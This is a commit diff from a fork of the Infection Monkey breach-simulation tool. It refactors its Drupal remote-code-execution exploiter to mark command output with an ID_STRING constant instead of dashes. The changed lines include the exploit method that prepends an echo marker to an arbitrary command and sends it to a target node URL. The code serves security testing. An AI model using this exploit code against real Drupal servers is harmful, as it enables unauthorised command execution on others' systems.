forked from p34709852/monkey
use ID_STRING instead of dashes
This commit is contained in:
parent
c9ea95110c
commit
b82a6e48b2
|
@ -8,6 +8,7 @@ import logging
|
||||||
import requests
|
import requests
|
||||||
from urllib.parse import urljoin
|
from urllib.parse import urljoin
|
||||||
from infection_monkey.exploit.web_rce import WebRCE
|
from infection_monkey.exploit.web_rce import WebRCE
|
||||||
|
from infection_monkey.model import ID_STRING
|
||||||
from network.network_utils import remove_port
|
from network.network_utils import remove_port
|
||||||
|
|
||||||
__author__ = 'Ophir Harpaz'
|
__author__ = 'Ophir Harpaz'
|
||||||
|
@ -70,7 +71,7 @@ class DrupalExploiter(WebRCE):
|
||||||
for node_id in node_ids:
|
for node_id in node_ids:
|
||||||
node_url = urljoin(url, str(node_id))
|
node_url = urljoin(url, str(node_id))
|
||||||
if self.check_if_exploitable(node_url):
|
if self.check_if_exploitable(node_url):
|
||||||
self.add_vuln_url(url) # Where is this used?
|
self.add_vuln_url(url) # This is for report. Should be refactored in the future
|
||||||
self.vulnerable_urls.append(node_url)
|
self.vulnerable_urls.append(node_url)
|
||||||
if stop_checking:
|
if stop_checking:
|
||||||
break
|
break
|
||||||
|
@ -114,7 +115,7 @@ class DrupalExploiter(WebRCE):
|
||||||
|
|
||||||
def exploit(self, url, command):
|
def exploit(self, url, command):
|
||||||
# pad a easy search replace output:
|
# pad a easy search replace output:
|
||||||
cmd = 'echo ---- && ' + command
|
cmd = f'echo {ID_STRING} && {command}'
|
||||||
base = remove_port(url)
|
base = remove_port(url)
|
||||||
payload = {
|
payload = {
|
||||||
"link": [
|
"link": [
|
||||||
|
@ -145,10 +146,10 @@ class DrupalExploiter(WebRCE):
|
||||||
if check_drupal_cache(r):
|
if check_drupal_cache(r):
|
||||||
LOG.info(f'Exploiting {url} returned cache HIT, may have failed')
|
LOG.info(f'Exploiting {url} returned cache HIT, may have failed')
|
||||||
|
|
||||||
if '----' not in r.text:
|
if ID_STRING not in r.text:
|
||||||
LOG.info('[warn] Command execution _may_ have failed')
|
LOG.warning('Command execution _may_ have failed')
|
||||||
|
|
||||||
result = r.text.split('----')[-1]
|
result = r.text.split(ID_STRING)[-1]
|
||||||
LOG.info(f'Drupal exploit result = {result}')
|
LOG.info(f'Drupal exploit result = {result}')
|
||||||
return result
|
return result
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue